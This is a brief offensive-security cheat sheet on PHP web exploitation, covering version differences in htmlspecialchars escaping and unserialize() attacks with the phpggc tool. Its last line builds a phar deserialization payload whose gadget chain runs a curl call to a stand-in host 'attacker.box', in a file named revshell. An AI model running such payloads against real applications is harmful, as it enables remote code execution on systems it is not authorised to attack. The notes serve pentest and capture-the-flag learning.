bazaar
Web Exploitation
PHP

PHP

Online PHP runner with various PHP version

https://onlinephp.io/

Dangerous functions

htmlspecialchars

htmlspecialchars — Convert special characters to HTML entities
Ref: https://www.php.net/manual/en/function.htmlspecialchars.php

Depending on the php version, the defaults my be different and not encode all characters. For example ' (single quote) is not converted by default in all PHP versions:

HTML special chars demo with PHP v7.4.33 vs PHP v8.2.20
HTML special chars demo with PHP v7.4.33 vs PHP v8.2.20

Deserialization with phpggc

PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

If you need to find libraries used by the application, look for composer.json or composer.lock

# show list of gadget chains
./phpggc -l

# deserialization via phar file
# (phar doesnt care about the extension)
# ZendFramework/RCE1 gadget selected here, but can be anything that supports __destruct or __wakeup vector
./phpggc -p phar -o /tmp/revshell.anything ZendFramework/RCE1 system "curl http://attacker.box/phar"